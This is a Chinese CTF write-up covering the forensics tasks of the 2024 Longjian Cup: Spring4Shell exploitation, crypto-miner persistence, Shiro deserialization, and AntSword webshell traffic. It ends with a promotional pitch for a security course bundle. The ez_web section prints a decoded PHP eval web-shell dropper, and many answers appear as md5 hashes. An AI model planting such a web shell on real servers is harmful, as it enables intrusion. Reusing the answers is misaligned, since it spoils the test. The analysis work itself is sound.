2024陇剑杯答题笔记（更新中）(1)

数据分析-SS

sevrer save_1

题目：

黑客是使用什么漏洞来拿下root权限的。格式为：CVE-2020-114514

观察流量，可以看到前面的请求均为/helloworld/xx，服务器返回404，推测是暴破流量，这里可以跳过向后看。
在最后的部分出现了shell.jsp，于是我们向上查看最后一次/helloworld/greeting的流量。
可以看到请求体为一个网页
搜索标题Reznok’s Hello World Spring Application，得到网页https://github.com/reznok/Spring4Shell-POC，其中记录漏洞编号为CVE-2022-22965

sevrer save_2

题目：

黑客反弹shell的ip和端口是什么，格式为：10.0.0.1:4444

继续观察后面几个数据包，可以观察到有下载的请求
我们检查这个包和下一个服务器返回的包，可以找到如下命令
这里即可找到反弹的地址和端口：192.168.43.128:2333

sevrer save_3

题目：

黑客的病毒名称是什么？ 格式为：filename

首先检查各用户目录。在/home/guests/中发现可疑文件main
观察文件可以发现是ELF可执行文件，推测为病毒。

sevrer save_4

题目：

黑客的病毒运行后创建了什么用户？请将回答用户名与密码：username:password

Linux用户名保存在/etc/passwd中，打开可以看到最近添加的是ll
密码存在/etc/shadow中，可以看到密码为123456
所以答案为：ll:123456

sevrer save_5

题目：

服务器在被入侵时外网ip是多少? 格式为：10.10.0.1

检查/home/guests/中的.log文件，可以看到向172.105.202.239发送了请求。

sevrer save_6

题目：

病毒运行后释放了什么文件？格式：文件1,文件2

继续观察.log文件可以看到执行了.idea/mine_doge.sh文件
在.idea中检查到如下两个文件，推测为挖矿软件。

sevrer save_7

题目：

矿池地址是什么？ 格式：domain:1234

打开mine_doge.sh可以看到内容如下
可以在POOL中找到矿池地址为 doge.millpools.cc:5567

sevrer save_8

题目：

黑客的钱包地址是多少？格式：xx:xxxxxxxx

如上题，可在mine_doge.sh中找到钱包地址为 DRXz1q6ys8Ao2KnPbtb7jQhPjDSqtwmNN9.lolMinerWorker

数据分析-WS

Wireshark1_1

题目：

被入侵主机的IP是？

经过排序后可以看到只有两个ip在通信，所以可以推测ip为192.168.246.28

Wireshark1_2

题目：

被入侵主机的口令是？

观察到这是一个telnet通信，于是追踪数据包
可以看到口令为 youcannevergetthis

Wireshark1_3

题目：

用户目录下第二个文件夹的名称是？

继续观察上一题的流量包，可以看到有文件夹列表，第二个为Downloads

Wireshark1_4

题目：

/etc/passwd中倒数第二个用户的用户名是？

从这里可以知道后面的内容是/etc/passwd文件内容，所以倒数第二个是mysql

数据分析-IR

IncidentResponse_1

题目：

你是公司的一名安全运营工程师，今日接到外部监管部门通报，你公司网络出口存在请求挖矿域名的行为。需要立即整改。经过与网络组配合，你们定位到了请求挖矿域名的内网IP是10.221.36.21。查询CMDB后得知该IP运行了公司的工时系统。（虚拟机账号密码为：root/IncidentResponsePasswd） 挖矿程序所在路径是？（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n 'strings'|md5sum|cut -d ' ' -f1获取md5值作为答案）

先通过ls -la --sort=t查看近期文件改动
于是我们依次检查这些文件。在.viminfo中发现大量redis操作
进入redis目录，可以看到redis-server有7万次操作可以确定为挖矿软件
于是答案为6f72038a870f05cbf923633066e48881

IncidentResponse_2

题目：

挖矿程序连接的矿池域名是？（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n 'strings'|md5sum|cut -d ' ' -f1获取md5值作为答案）

确认挖矿软件后，打开redis配置文件，在里面搜索WALLET，可以找到如下配置
于是矿池为donate.v2.xmrig.com，答案为3fca20bb92d0ed67714e68704a0a4503

IncidentResponse_3

攻击者入侵服务器的利用的方法是？（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n 'strings'|md5sum|cut -d ' ' -f1获取md5值作为答案）

之前查看.bash_history时注意到有一个renren-admin.jar运行了nohup服务（即后台运行）
注意到/home/app/下有此jar包且运行次数非常高，于是我们检查nohub.log
多处发现shiro关键字，推测为shiro反序列化漏洞。
所以答案为shirodeserialization，转化为标准格式后得到3ee726cb32f87a15d22fe55fa04c4dcd

IncidentResponse_4

题目：

攻击者的IP是？（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n 'strings'|md5sum|cut -d ' ' -f1获取md5值作为答案）

检查登录信息，可以发现有一条外网连接，ip为81.70.166.3，所以答案为c76b4b1a5e8c9e7751af4684c6a8b2c9

IncidentResponse_5

题目：

攻击者发起攻击时使用的User-Agent是？（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n 'strings'|md5sum|cut -d ' ' -f1获取md5值作为答案）

检查Nginx日志（/var/log/nginx/access.log）中查看访问信息，可以在最后找到ua信息为Mozilla/5.0 (compatible; Baiduspider/2.0; +http://baidu.com/search/spider.html)

IncidentResponse_6

题目：

攻击者使用了两种权限维持手段，相应的配置文件路径是？(md5加密后以a开头)（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n 'strings'|md5sum|cut -d ' ' -f1获取md5值作为答案）

检查.ssh目录，查看authorized_keys文件

在这里发现开启了ssh私钥登录，且用户为root@kali。所以答案为/root/.ssh/authorized_keys，转化格式后得到a1fa1b5aeb1f97340032971c342c4258

IncidentResponse_7

题目：

攻击者使用了两种权限维持手段，相应的配置文件路径是？(md5加密后以b开头)（答案中如有空格均需去除，如有大写均需变为小写，使用echo -n 'strings'|md5sum|cut -d ' ' -f1获取md5值作为答案）

可能是开机自启，所以检查/root/lib/systemd/system/和/etc/systemd/system/，在/root/lib/systemd/system/中找到了redis.service文件。查看文件可以发现redis会自启连接矿池。
所以答案为/lib/systemd/system/redis.service，转换格式为b2c5af8ce08753894540331e5a947d35

数据分析-SSW

SmallSword_1

题目：

连接蚁剑的正确密码是______________?（答案示例：123asd）

首先过滤http包，注意到如下流量，形如蚁剑一句话木马，选择追踪流量。
可以在$_POST中找到连接密码6ea280898e404bfabd0ebb702327b18f，其中%22代表双引号。

SmallSword_2

题目：

攻击者留存的值是______________?(答案示例：d1c3f0d3-68bb-4d85-a337-fb97cf99ee2e)

检查蚁剑流量，并用Base64解码
在这个流量包中发现上传如下值
解码后得到ad6269b7-3ce2-4ae8-b97f-f259515e7a91 ，即为答案。

SmallSword_3

题目：

攻击者下载到的flag是______________?(答案示例：flag3{uuid})

待更

数据分析-EW

ez_web_1

题目：

服务器自带的后门文件名是什么？（含文件后缀）

后门文件需要上传，所以我们过滤POST请求，得到以下流量
可以发现d00r.php为后门文件。但我们检查第一个流量a=file_put_contents%28%27d00r.php%27%2C+base64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs%2FPg%3D%3D%27%29%29%3B,可转译为a=file_put_contents(‘d00r.php’,+base64_decode(‘<?php eval($_POST['cmd']);?>’);
可以发现是ViewMore.php上传的d00r.php文件。所以真正的后门文件为ViewMore.php

ez_web_2

题目：

服务器的内网IP是多少？

依次检查d00r.php流量包，在其中一个找到了system%28%27ifconfig%27%29%3B即system('ifconfig');
所以下面的响应数据为ip地址，内网ip为192.168.101.132

ez_web_3

题目：

攻击者往服务器中写入的key是什么？

继续先后检查流量包，发现如下命令
推测为上传key_file文件，使用base64解码后面的数据得到一串编码。值得注意的是%27为'%28为(%29为)所以有效编码为它们中间的部分，并且需要替换编码中的字符%2F为/%3D为=。

本人从事网路安全工作12年，曾在2个大厂工作过，安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过，对这个行业了解比较全面。

最近遍览了各种网络安全类的文章，内容参差不齐，其中不伐有大佬倾力教学，也有各种不良机构浑水摸鱼，在收到几条私信，发现大家对一套完整的系统的网络安全从学习路线到学习资料，甚至是工具有着不小的需求。

最后，我将这部分内容融会贯通成了一套282G的网络安全资料包，所有类目条理清晰，知识点层层递进，需要的小伙伴可以点击下方小卡片领取哦！下面就开始进入正题，如何从一个萌新一步一步进入网络安全行业。

学习路线图

其中最为瞩目也是最为基础的就是网络安全学习路线图，这里我给大家分享一份打磨了3个月，已经更新到4.0版本的网络安全学习路线图。

相比起繁琐的文字，还是生动的视频教程更加适合零基础的同学们学习，这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。

网络安全工具箱

当然，当你入门之后，仅仅是视频教程已经不能满足你的需求了，你肯定需要学习各种工具的使用以及大量的实战项目，这里也分享一份我自己整理的网络安全入门工具以及使用教程和实战。

项目实战

最后就是项目实战，这里带来的是SRC资料&HW资料，毕竟实战是检验真理的唯一标准嘛~

面试题

归根结底，我们的最终目的都是为了就业，所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过！